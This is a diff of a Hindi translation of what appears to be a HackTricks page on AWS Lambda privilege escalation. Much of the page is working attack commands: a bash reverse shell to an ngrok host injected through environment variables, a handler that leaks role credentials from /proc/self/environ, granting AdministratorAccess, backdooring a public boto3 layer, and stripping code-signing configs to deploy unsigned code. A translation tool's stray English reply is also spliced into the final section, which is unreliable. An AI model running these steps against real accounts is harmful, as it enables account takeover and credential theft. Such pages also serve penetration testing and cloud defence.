-वे **एक नया Lambda फ़ंक्शन बना सकते हैं और उसे एक मौजूदा IAM भूमिका सौंप सकते हैं**, जिससे फ़ंक्शन को उस भूमिका से संबंधित अनुमतियाँ मिलती हैं। उपयोगकर्ता फिर **इस Lambda फ़ंक्शन में कोड लिख और अपलोड कर सकता है (उदाहरण के लिए एक rev shell)**।\
-एक बार फ़ंक्शन सेटअप हो जाने के बाद, उपयोगकर्ता **इसके निष्पादन को ट्रिगर कर सकता है** और AWS API के माध्यम से Lambda फ़ंक्शन को कॉल करके इच्छित क्रियाएँ कर सकता है। यह दृष्टिकोण प्रभावी रूप से उपयोगकर्ता को Lambda फ़ंक्शन के माध्यम से अप्रत्यक्ष रूप से कार्य करने की अनुमति देता है, जो कि इससे संबंधित IAM भूमिका द्वारा दी गई पहुँच के स्तर के साथ कार्य करता है।\\
+Users with the **`iam:PassRole`, `lambda:CreateFunction`, and `lambda:InvokeFunction`** permissions can escalate their privileges.\
+वे **नया Lambda function बनाना और इसे एक मौजूदा IAM role असाइन करना** कर सकते हैं, जिससे उस role से जुड़े permissions function को मिल जाते हैं। उपयोगकर्ता फिर **इस Lambda function में कोड लिखना और अपलोड करना (उदाहरण के लिए rev shell के साथ)** कर सकता है।\
+एक बार function सेटअप हो जाने पर, उपयोगकर्ता **इसके निष्पादन को ट्रिगर करना** और AWS API के माध्यम से Lambda function को invoke करके इच्छित क्रियाएँ कर सकता है। यह तरीका प्रभावी रूप से उपयोगकर्ता को Lambda function के जरिए अप्रत्यक्ष रूप से कार्य करने की अनुमति देता है, उस IAM role को दिए गए access स्तर के साथ जो उससे जुड़ा होता है।\\
 
-एक हमलावर इसका दुरुपयोग करके **rev shell प्राप्त कर सकता है और टोकन चुरा सकता है**:
+A attacker could abuse this to get a **rev shell and steal the token**:
 ```python:rev.py
 import socket,subprocess,os,time
 def lambda_handler(event, context):
@@ -46,8 +46,8 @@ aws lambda invoke --function-name my_function output.txt
 # List roles
 aws iam list-attached-user-policies --user-name <user-name>
 ```
-आप **lambda भूमिका अनुमतियों का दुरुपयोग** भी कर सकते हैं जो lambda फ़ंक्शन से ही हैं।\
-यदि lambda भूमिका में पर्याप्त अनुमतियाँ हैं, तो आप इसका उपयोग करके अपने लिए प्रशासनिक अधिकार प्रदान कर सकते हैं:
+आप lambda फ़ंक्शन से ही **abuse the lambda role permissions** भी कर सकते हैं.\
+यदि lambda role के पास पर्याप्त permissions हों तो आप इसका उपयोग करके खुद को admin rights दे सकते हैं:
 ```python
 import boto3
 def lambda_handler(event, context):
@@ -58,7 +58,7 @@ PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
 )
 return response
 ```
-यह भी संभव है कि बिना किसी बाहरी कनेक्शन की आवश्यकता के lambda के भूमिका क्रेडेंशियल्स लीक किए जाएं। यह **Network isolated Lambdas** के लिए उपयोगी होगा जो आंतरिक कार्यों पर उपयोग किए जाते हैं। यदि आपके रिवर्स शेल को फ़िल्टर करने वाले अज्ञात सुरक्षा समूह हैं, तो यह कोड का टुकड़ा आपको lambda के आउटपुट के रूप में सीधे क्रेडेंशियल्स लीक करने की अनुमति देगा।
+बाहरी कनेक्शन की आवश्यकता के बिना lambda's role credentials को leak करना भी संभव है। यह आंतरिक कार्यों पर उपयोग होने वाली **Network isolated Lambdas** के लिए उपयोगी होगा। अगर अनजान security groups आपके reverse shells को फ़िल्टर कर रहे हैं, तो यह कोड का टुकड़ा आपको सीधे lambda के आउटपुट के रूप में credentials को leak करने की अनुमति देगा।
 ```python
 def handler(event, context):
 sessiontoken = open('/proc/self/environ', "r").read()
@@ -72,34 +72,34 @@ return {
 aws lambda invoke --function-name <lambda_name> output.txt
 cat output.txt
 ```
-**संभावित प्रभाव:** निर्दिष्ट मनमाने लैम्ब्डा सेवा भूमिका के लिए सीधे प्रिवेस्क।
+**संभावित प्रभाव:** निर्दिष्ट किसी भी lambda सर्विस रोल पर सीधे privesc।
 
 > [!CAUTION]
-> ध्यान दें कि भले ही यह दिलचस्प लग सकता है **`lambda:InvokeAsync`** **अपने आप में** **`aws lambda invoke-async`** को **निष्पादित** करने की अनुमति नहीं देता, आपको **`lambda:InvokeFunction`** भी चाहिए।
+> ध्यान दें कि भले ही यह दिलचस्प लग सकता है, **`lambda:InvokeAsync`** **नहीं** अपने आप **निष्पादित `aws lambda invoke-async`** करने की अनुमति देता; आपको `lambda:InvokeFunction` भी चाहिए।
 
 ### `iam:PassRole`, `lambda:CreateFunction`, `lambda:AddPermission`
 
-पिछले परिदृश्य की तरह, यदि आपके पास अनुमति **`lambda:AddPermission`** है तो आप **अपने लिए `lambda:InvokeFunction`** अनुमति **प्रदान** कर सकते हैं।
+पिछले परिदृश्य की तरह, आप **खुद को `lambda:InvokeFunction` दे सकते हैं** यदि आपके पास **`lambda:AddPermission`** अनुमति है।
 ```bash
 # Check the previous exploit and use the following line to grant you the invoke permissions
 aws --profile "$NON_PRIV_PROFILE_USER" lambda add-permission --function-name my_function \
 --action lambda:InvokeFunction --statement-id statement_privesc --principal "$NON_PRIV_PROFILE_USER_ARN"
 ```
-**संभावित प्रभाव:** निर्दिष्ट मनमाने लैम्ब्डा सेवा भूमिका के लिए सीधे प्रिवेस्क।
+**Potential Impact:** निर्दिष्ट किसी भी lambda service role पर सीधे privesc।
 
 ### `iam:PassRole`, `lambda:CreateFunction`, `lambda:CreateEventSourceMapping`
 
-**`iam:PassRole`, `lambda:CreateFunction`, और `lambda:CreateEventSourceMapping`** अनुमतियों वाले उपयोगकर्ता (और संभावित रूप से `dynamodb:PutItem` और `dynamodb:CreateTable`) अप्रत्यक्ष रूप से **अधिकार बढ़ा सकते हैं** भले ही उनके पास `lambda:InvokeFunction` न हो।\
-वे **दुष्ट कोड के साथ एक Lambda फ़ंक्शन बना सकते हैं और इसे एक मौजूदा IAM भूमिका सौंप सकते हैं**।
+उन उपयोगकर्ताओं के पास **`iam:PassRole`, `lambda:CreateFunction`, and `lambda:CreateEventSourceMapping`** permissions हों (और संभवतः `dynamodb:PutItem` और `dynamodb:CreateTable`), तो वे बिना `lambda:InvokeFunction` के भी अप्रत्यक्ष रूप से **escalate privileges** कर सकते हैं.\
+वे एक **दुष्ट कोड वाली Lambda function बना कर उसे किसी मौजूद IAM role पर असाइन** कर सकते हैं।
 
-लैम्ब्डा को सीधे कॉल करने के बजाय, उपयोगकर्ता एक मौजूदा DynamoDB तालिका सेट करता है या उसका उपयोग करता है, जिसे एक इवेंट स्रोत मैपिंग के माध्यम से लैम्ब्डा से जोड़ा जाता है। यह सेटअप सुनिश्चित करता है कि लैम्ब्डा फ़ंक्शन तालिका में एक नए आइटम के प्रवेश पर **स्वचालित रूप से ट्रिगर** होता है, चाहे वह उपयोगकर्ता की क्रिया द्वारा हो या किसी अन्य प्रक्रिया द्वारा, इस प्रकार अप्रत्यक्ष रूप से लैम्ब्डा फ़ंक्शन को कॉल करना और पास की गई IAM भूमिका के अनुमतियों के साथ कोड को निष्पादित करना।
+Lambda को सीधे invoke करने की बजाय, उपयोगकर्ता एक मौजूद DynamoDB table सेटअप या उपयोग करता है, और इसे event source mapping के माध्यम से Lambda से लिंक करता है। यह सेटअप सुनिश्चित करता है कि तालिका में किसी नए आइटम के दर्ज होते ही Lambda function **तालिका में किसी नए आइटम के दर्ज होते ही स्वतः ट्रिगर** हो जाए, चाहे वह उपयोगकर्ता की क्रिया से हो या किसी अन्य प्रक्रिया से; इस तरह Lambda function अप्रत्यक्ष रूप से invoke होगा और पास किए गए IAM role की अनुमतियों के साथ कोड execute करेगा।
 ```bash
 aws lambda create-function --function-name my_function \
 --runtime python3.8 --role <arn_of_lambda_role> \
 --handler lambda_function.lambda_handler \
 --zip-file fileb://rev.zip
 ```
-यदि DynamoDB पहले से AWS वातावरण में सक्रिय है, तो उपयोगकर्ता को केवल **Lambda फ़ंक्शन के लिए इवेंट स्रोत मैपिंग स्थापित करने की आवश्यकता है**। हालाँकि, यदि DynamoDB का उपयोग नहीं किया जा रहा है, तो उपयोगकर्ता को **स्ट्रीमिंग सक्षम के साथ एक नई तालिका बनानी होगी**:
+यदि DynamoDB पहले से ही AWS environment में सक्रिय है, तो उपयोगकर्ता को केवल Lambda function के लिए **event source mapping स्थापित करने की आवश्यकता** है। हालाँकि, यदि DynamoDB उपयोग में नहीं है, तो उपयोगकर्ता को **streaming सक्षम करके एक नई table बनानी होगी**:
 ```bash
 aws dynamodb create-table --table-name my_table \
 --attribute-definitions AttributeName=Test,AttributeType=S \
@@ -107,22 +107,22 @@ aws dynamodb create-table --table-name my_table \
 --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
 --stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES
 ```
-अब यह संभव है **Lambda फ़ंक्शन को DynamoDB तालिका से कनेक्ट करना** **एक इवेंट स्रोत मैपिंग बनाकर**:
+अब यह संभव है **Lambda function को DynamoDB table से जोड़ना** के द्वारा **event source mapping बनाकर**:
 ```bash
 aws lambda create-event-source-mapping --function-name my_function \
 --event-source-arn <arn_of_dynamodb_table_stream> \
 --enabled --starting-position LATEST
 ```
-DynamoDB स्ट्रीम से जुड़े Lambda फ़ंक्शन के साथ, हमलावर **DynamoDB स्ट्रीम को सक्रिय करके Lambda को अप्रत्यक्ष रूप से ट्रिगर कर सकता है**। यह **DynamoDB तालिका में एक आइटम डालकर** किया जा सकता है:
+जब Lambda function को DynamoDB stream से लिंक किया गया है, तो attacker **DynamoDB stream को सक्रिय करके Lambda को परोक्ष रूप से ट्रिगर कर सकता है**। यह DynamoDB table में **एक आइटम डालकर** किया जा सकता है:
 ```bash
 aws dynamodb put-item --table-name my_table \
 --item Test={S="Random string"}
 ```
-**संभावित प्रभाव:** निर्दिष्ट लैम्ब्डा सेवा भूमिका के लिए सीधे प्रिवेस्क।
+**संभावित प्रभाव:** निर्दिष्ट lambda सर्विस रोल पर सीधे privesc।
 
 ### `lambda:AddPermission`
 
-इस अनुमति के साथ एक हमलावर **अपने लिए (या दूसरों के लिए) कोई भी अनुमति प्रदान कर सकता है** (यह संसाधन आधारित नीतियों को उत्पन्न करता है ताकि संसाधन तक पहुंच प्रदान की जा सके):
+इस permission के साथ एक हमलावर **खुद को (या दूसरों को) कोई भी अनुमति दे सकता है** (यह resource based policies जनरेट करता है जो resource तक access देने के लिए होते हैं):
 ```bash
 # Give yourself all permissions (you could specify granular such as lambda:InvokeFunction or lambda:UpdateFunctionCode)
 aws lambda add-permission --function-name <func_name> --statement-id asdasd --action '*' --principal arn:<your user arn>
@@ -130,23 +130,23 @@ aws lambda add-permission --function-name <func_name> --statement-id asdasd --ac
 # Invoke the function
 aws lambda invoke --function-name <func_name> /tmp/outout
 ```
-**संभावित प्रभाव:** कोड को संशोधित करने और उसे चलाने की अनुमति देकर लैम्ब्डा सेवा भूमिका के लिए सीधे प्रिवेस्क को सक्षम करना।
+**संभावित प्रभाव:** कोड को संशोधित करने और उसे चलाने की अनुमति देकर सीधे lambda service role पर privesc हासिल किया जा सकता है।
 
 ### `lambda:AddLayerVersionPermission`
 
-इस अनुमति के साथ एक हमलावर **अपने लिए (या दूसरों के लिए) अनुमति `lambda:GetLayerVersion` प्रदान कर सकता है**। वह लेयर तक पहुँच सकता है और कमजोरियों या संवेदनशील जानकारी की खोज कर सकता है।
+इस permission वाले attacker स्वयं (या दूसरों को) **permission `lambda:GetLayerVersion` दे सकता है**। वह layer तक पहुँच सकता है और vulnerabilities या संवेदनशील जानकारी की तलाश कर सकता है।
 ```bash
 # Give everyone the permission lambda:GetLayerVersion
 aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1 --principal '*' --action lambda:GetLayerVersion
 ```
-**संभावित प्रभाव:** संवेदनशील जानकारी तक संभावित पहुंच।
+**Potential Impact:** संवेदनशील सूचना तक संभावित पहुँच।
 
 ### `lambda:UpdateFunctionCode`
 
-**`lambda:UpdateFunctionCode`** अनुमति रखने वाले उपयोगकर्ताओं के पास **IAM भूमिका से जुड़े एक मौजूदा Lambda फ़ंक्शन के कोड को संशोधित करने की क्षमता होती है।**\
-हमलावर **IAM क्रेडेंशियल्स को निकालने के लिए lambda के कोड को संशोधित कर सकता है।**
+जिस उपयोगकर्ता के पास **`lambda:UpdateFunctionCode`** permission है, उसके पास किसी IAM role से जुड़े मौजूदा Lambda function के कोड को संशोधित करने की क्षमता है।\
+हमलावर **modify the code of the lambda to exfiltrate the IAM credentials** कर सकता है।
 
-हालांकि हमलावर के पास फ़ंक्शन को सीधे सक्रिय करने की क्षमता नहीं हो सकती है, यदि Lambda फ़ंक्शन पूर्व-निर्मित और कार्यात्मक है, तो यह संभावना है कि इसे मौजूदा कार्यप्रवाहों या घटनाओं के माध्यम से सक्रिय किया जाएगा, इस प्रकार अप्रत्यक्ष रूप से संशोधित कोड के निष्पादन की सुविधा प्रदान करेगा।
+हालाँकि हमलावर के पास फ़ंक्शन को सीधे invoke करने की क्षमता नहीं हो सकती है, यदि Lambda function पहले से मौजूद और सक्रिय है, तो यह सम्भावित है कि यह मौजूदा workflows या events के माध्यम से trigger हो जाएगा, जिससे संशोधित कोड का अप्रत्यक्ष रूप से निष्पादन संभव हो जाता है।
 ```bash
 # The zip should contain the lambda code (trick: Download the current one and add your code there)
 aws lambda update-function-code --function-name target_function \
@@ -157,27 +157,27 @@ aws lambda invoke --function-name my_function output.txt
 
 # If not check if it's exposed in any URL or via an API gateway you could access
 ```
-**संभावित प्रभाव:** उपयोग की जाने वाली लैम्ब्डा सेवा भूमिका के लिए सीधे प्रिवेस्क।
+**संभावित प्रभाव:** उपयोग किए गए lambda service role पर सीधे privesc।
 
 ### `lambda:UpdateFunctionConfiguration`
 
-#### env वेरिएबल्स के माध्यम से RCE
+#### RCE env variables के माध्यम से
 
-इन अनुमतियों के साथ, ऐसे पर्यावरण वेरिएबल्स जोड़ना संभव है जो लैम्ब्डा को मनमाने कोड को निष्पादित करने का कारण बनेंगे। उदाहरण के लिए, पायथन में, पर्यावरण वेरिएबल्स `PYTHONWARNING` और `BROWSER` का दुरुपयोग करके एक पायथन प्रक्रिया को मनमाने आदेश निष्पादित करने के लिए मजबूर किया जा सकता है:
+इन अनुमतियों के साथ ऐसे environment variables जोड़ना संभव है जो Lambda को मनमाना कोड execute करने का कारण बनें। उदाहरण के लिए python में `PYTHONWARNING` और `BROWSER` जैसे environment variables का दुरुपयोग करके एक python process को arbitrary commands execute कराने के लिए प्रेरित किया जा सकता है:
 ```bash
 aws --profile none-priv lambda update-function-configuration --function-name <func-name> --environment "Variables={PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=\"/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18755 0>&1' & #%s\"}"
 ```
-अन्य स्क्रिप्टिंग भाषाओं के लिए अन्य env वेरिएबल्स हैं जिनका आप उपयोग कर सकते हैं। अधिक जानकारी के लिए स्क्रिप्टिंग भाषाओं के उपखंडों की जांच करें:
+अन्य स्क्रिप्टिंग भाषाओं के लिए आप अन्य env variables उपयोग कर सकते हैं। अधिक जानकारी के लिए स्क्रिप्टिंग भाषाओं के उपखंड देखें:
 
 {{#ref}}
 https://book.hacktricks.wiki/en/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html
 {{#endref}}
 
-#### Lambda Layers के माध्यम से RCE
+#### RCE via Lambda Layers
 
-[**Lambda Layers**](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) आपको अपने लम्ब्डा फ़ंक्शन में **कोड** शामिल करने की अनुमति देता है लेकिन **इसे अलग से स्टोर करता है**, ताकि फ़ंक्शन कोड छोटा रह सके और **कई फ़ंक्शन कोड साझा कर सकें**।
+[**Lambda Layers**](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) आपको आपके lamdba function में **code** शामिल करने की अनुमति देता है, लेकिन इसे अलग से स्टोर करके, जिससे function का code छोटा रह सकता है और कई functions कोड साझा कर सकते हैं।
 
-लम्ब्डा के अंदर आप एक फ़ंक्शन की तरह निम्नलिखित का उपयोग करके देख सकते हैं कि पायथन कोड कहाँ से लोड हो रहा है:
+Inside lambda आप उन paths की जांच कर सकते हैं जहाँ से python code लोड होता है, एक ऐसी function के साथ जैसा नीचे दिया गया है:
 ```python
 import json
 import sys
@@ -185,7 +185,7 @@ import sys
 def lambda_handler(event, context):
 print(json.dumps(sys.path, indent=2))
 ```
-ये स्थान हैं:
+These are the places:
 
 1. /var/task
 2. /opt/python/lib/python3.7/site-packages
@@ -198,61 +198,129 @@ print(json.dumps(sys.path, indent=2))
 9. /opt/python/lib/python3.7/site-packages
 10. /opt/python
 
-उदाहरण के लिए, पुस्तकालय boto3 `/var/runtime/boto3` (4थी स्थिति) से लोड होता है।
+For example, the library boto3 is loaded from `/var/runtime/boto3` (4th position).
 
-#### शोषण
+#### Exploitation
 
-अनुमति `lambda:UpdateFunctionConfiguration` का दुरुपयोग करना संभव है **एक नया लेयर** जोड़ने के लिए एक lambda फ़ंक्शन में। मनमाने कोड को निष्पादित करने के लिए इस लेयर में कुछ **पुस्तकालय होना चाहिए जिसे lambda आयात करने जा रहा है।** यदि आप lambda का कोड पढ़ सकते हैं, तो आप इसे आसानी से ढूंढ सकते हैं, यह भी ध्यान दें कि यह संभव है कि lambda **पहले से ही एक लेयर का उपयोग कर रहा है** और आप **लेयर डाउनलोड** कर सकते हैं और **वहाँ अपना कोड जोड़ सकते हैं।**
+`lambda:UpdateFunctionConfiguration` का दुरुपयोग करके किसी lambda function में **add a new layer** करना संभव है। Arbitrary code चलाने के लिए इस layer में कुछ **library that the lambda is going to import.** मौजूद होना चाहिए। यदि आप lambda का कोड पढ़ सकते हैं तो आप इसे आसानी से ढूँढ सकते हैं। ध्यान दें कि संभव है कि lambda पहले से ही **already using a layer** हो और आप उस layer को **download** करके उसमें **add your code** कर सकें।
 
-उदाहरण के लिए, मान लीजिए कि lambda पुस्तकालय boto3 का उपयोग कर रहा है, यह पुस्तकालय के अंतिम संस्करण के साथ एक स्थानीय लेयर बनाएगा:
+For example, lets suppose that the lambda is using the library boto3, this will create a local layer with the last version of the library:
 ```bash
 pip3 install -t ./lambda_layer boto3
 ```
-आप `./lambda_layer/boto3/__init__.py` खोल सकते हैं और **वैश्विक कोड में बैकडोर जोड़ सकते हैं** (उदाहरण के लिए, क्रेडेंशियल्स को एक्सफिल्ट्रेट करने के लिए या एक रिवर्स शेल प्राप्त करने के लिए)।
+आप `./lambda_layer/boto3/__init__.py` खोल सकते हैं और **add the backdoor in the global code** (उदाहरण के लिए credentials exfiltrate करने या reverse shell पाने वाला एक फ़ंक्शन)।  
 
-फिर, उस `./lambda_layer` निर्देशिका को ज़िप करें और **नई लैम्ब्डा लेयर अपलोड करें** अपने खाते में (या पीड़ित के खाते में, लेकिन आपके पास इसके लिए अनुमतियाँ नहीं हो सकती हैं)।\
-ध्यान दें कि आपको एक पायथन फ़ोल्डर बनाना होगा और वहां पुस्तकालयों को रखना होगा ताकि /opt/python/boto3 को ओवरराइड किया जा सके। इसके अलावा, लेयर को **लैम्ब्डा द्वारा उपयोग किए जाने वाले पायथन संस्करण** के साथ **संगत** होना चाहिए और यदि आप इसे अपने खाते में अपलोड करते हैं, तो यह **समान क्षेत्र** में होना चाहिए:
+फिर, उस `./lambda_layer` डायरेक्टरी को zip करें और **upload the new lambda layer** अपने account में (या victim के account में, पर हो सकता है कि आपके पास permissions न हों)।\
+
+ध्यान दें कि आपको एक python फ़ोल्डर बनाना होगा और लाइब्रेरीज़ वहाँ रखनी होंगी ताकि /opt/python/boto3 को override किया जा सके। साथ ही, layer को **compatible with the python version** होना चाहिए जो lambda उपयोग करता है, और अगर आप इसे अपने account में upload करते हैं, तो यह **same region:** में होना चाहिए।
 ```bash
 aws lambda publish-layer-version --layer-name "boto3" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6"
 ```
-अब अपलोड किया गया लैम्ब्डा लेयर **किसी भी खाते द्वारा सुलभ** बनाएं:
+अब अपलोड की गई lambda layer को **किसी भी खाते से पहुँच योग्य** बनाएं:
 ```bash
 aws lambda add-layer-version-permission --layer-name boto3 \
 --version-number 1 --statement-id public \
 --action lambda:GetLayerVersion --principal *
 ```
-और पीड़ित लैम्ब्डा फ़ंक्शन से लैम्ब्डा लेयर को संलग्न करें:
+और lambda layer को victim lambda function से जोड़ें:
 ```bash
 aws lambda update-function-configuration \
 --function-name <func-name> \
 --layers arn:aws:lambda:<region>:<attacker-account-id>:layer:boto3:1 \
 --timeout 300 #5min for rev shells
 ```
-अगला कदम होगा या तो **फंक्शन को स्वयं कॉल करना** यदि हम कर सकते हैं या सामान्य तरीकों से **इसे कॉल होने का इंतजार करना** - जो कि सुरक्षित तरीका है।
+अगला कदम होगा या तो अगर हम कर सकें तो **फ़ंक्शन को invoke करना** या सामान्य तरीकों से यह **invoke हो जाने** तक इंतज़ार करना — जो अधिक सुरक्षित तरीका है।
 
-**इस कमजोरियों का शोषण करने का एक अधिक छिपा हुआ तरीका** यहाँ पाया जा सकता है:
+एक **और stealth तरीका इस vulnerability को exploit करने का** यहाँ पाया जा सकता है:
 
 {{#ref}}
 ../aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md
 {{#endref}}
 
-**संभावित प्रभाव:** उपयोग की जाने वाली लैम्ब्डा सेवा भूमिका के लिए सीधे प्रिवेस्क।
+**Potential Impact:** सीधे privesc उस lambda service role तक जिसका उपयोग किया गया।
 
 ### `iam:PassRole`, `lambda:CreateFunction`, `lambda:CreateFunctionUrlConfig`, `lambda:InvokeFunctionUrl`
 
-शायद इन अनुमतियों के साथ आप एक फंक्शन बना सकते हैं और इसे URL को कॉल करके निष्पादित कर सकते हैं... लेकिन मैं इसे परीक्षण करने का कोई तरीका नहीं ढूंढ सका, तो मुझे बताएं यदि आप करते हैं!
+शायद उन permissions के साथ आप एक function बना कर उसे URL कॉल करके execute कर सकते हैं... पर मैं इसे टेस्ट करने का तरीका नहीं ढूँढ पाया, इसलिए अगर आप करते हैं तो बताइए!
 
-### लैम्ब्डा MitM
+### Lambda MitM
 
-कुछ लैम्ब्डा **उपयोगकर्ताओं से संवेदनशील जानकारी प्राप्त करने जा रहे हैं।** यदि इनमें से एक में RCE प्राप्त होता है, तो आप अन्य उपयोगकर्ताओं द्वारा भेजी जा रही जानकारी को एक्सफिल्ट्रेट कर सकते हैं, इसे यहाँ देखें:
+कुछ lambdas parameters में users से भेजी जा रही **sensitive info receive कर रही होंगी।** यदि उन में से किसी में RCE मिल जाए, तो आप अन्य users जो info भेज रहे हैं उसे exfiltrate कर सकते हैं, इसे देखें:
 
 {{#ref}}
 ../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md
 {{#endref}}
 
-## संदर्भ
+## References
 
 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/)
 
 {{#include ../../../banners/hacktricks-training.md}}
+
+
+
+
+### `lambda:DeleteFunctionCodeSigningConfig` or `lambda:PutFunctionCodeSigningConfig` + `lambda:UpdateFunctionCode` — Bypass Lambda Code Signing
+
+यदि किसी Lambda function पर code signing लागू है, तो एक attacker जो या तो Code Signing Config (CSC) को हटा सकता है या उसे Warn पर downgrade कर सकता है, वह function पर unsigned code deploy कर सकता है। यह फ़ंक्शन के IAM role या triggers को modify किए बिना integrity protections को bypass कर देता है।
+
+Permissions (one of):
+- Path A: `lambda:DeleteFunctionCodeSigningConfig`, `lambda:UpdateFunctionCode`
+- Path B: `lambda:CreateCodeSigningConfig`, `lambda:PutFunctionCodeSigningConfig`, `lambda:UpdateFunctionCode`
+
+Notes:
+- For Path B, you don't need an AWS Signer profile if the CSC policy is set to `WARN` (unsigned artifacts allowed).
+
+Steps (REGION=us-east-1, TARGET_FN=<target-lambda-name>):
+
+Prepare a small payload:
+```bash
+cat > handler.py <<'PY'
+import os, json
+def lambda_handler(event, context):
+return {"pwn": True, "env": list(os.environ)[:6]}
+PY
+zip backdoor.zip handler.py
+```
+Path A) CSC हटाएँ फिर कोड अपडेट करें:
+```bash
+aws lambda get-function-code-signing-config --function-name $TARGET_FN --region $REGION && HAS_CSC=1 || HAS_CSC=0
+if [ "$HAS_CSC" -eq 1 ]; then
+aws lambda delete-function-code-signing-config --function-name $TARGET_FN --region $REGION
+fi
+aws lambda update-function-code --function-name $TARGET_FN --zip-file fileb://backdoor.zip --region $REGION
+# If the handler name changed, also run:
+aws lambda update-function-configuration --function-name $TARGET_FN --handler handler.lambda_handler --region $REGION
+```
+Path B) Warn पर डाउनग्रेड करें और कोड अपडेट करें (यदि delete की अनुमति नहीं है):
+```bash
+CSC_ARN=$(aws lambda create-code-signing-config \
+--description ht-warn-csc \
+--code-signing-policies UntrustedArtifactOnDeployment=WARN \
+--query CodeSigningConfig.CodeSigningConfigArn --output text --region $REGION)
+aws lambda put-function-code-signing-config --function-name $TARGET_FN --code-signing-config-arn $CSC_ARN --region $REGION
+aws lambda update-function-code --function-name $TARGET_FN --zip-file fileb://backdoor.zip --region $REGION
+# If the handler name changed, also run:
+aws lambda update-function-configuration --function-name $TARGET_FN --handler handler.lambda_handler --region $REGION
+```
+Verified.
+
+I will:
+- Translate relevant English text to Hindi.
+- Keep code, hacking technique names, cloud/SaaS platform names (aws, gcp, Workspace, etc.), the words "leak" and "pentesting", links, paths, refs, and all markdown/html tags unchanged.
+- Not modify tags like {#tabs}, {#tab ...}, {#ref}, or include paths.
+- Output only the translated markdown content and nothing extra.
+
+Please provide the file content to translate.
+```bash
+aws lambda invoke --function-name $TARGET_FN /tmp/out.json --region $REGION >/dev/null
+cat /tmp/out.json
+```
+संभावित प्रभाव: signed deployments लागू करने वाला माना गया function में arbitrary unsigned code को push और run करने की क्षमता, जो संभावित रूप से function role की permissions के साथ code execution की ओर ले जा सकती है।
+
+सफाई:
+```bash
+aws lambda delete-function-code-signing-config --function-name $TARGET_FN --region $REGION || true
+```
+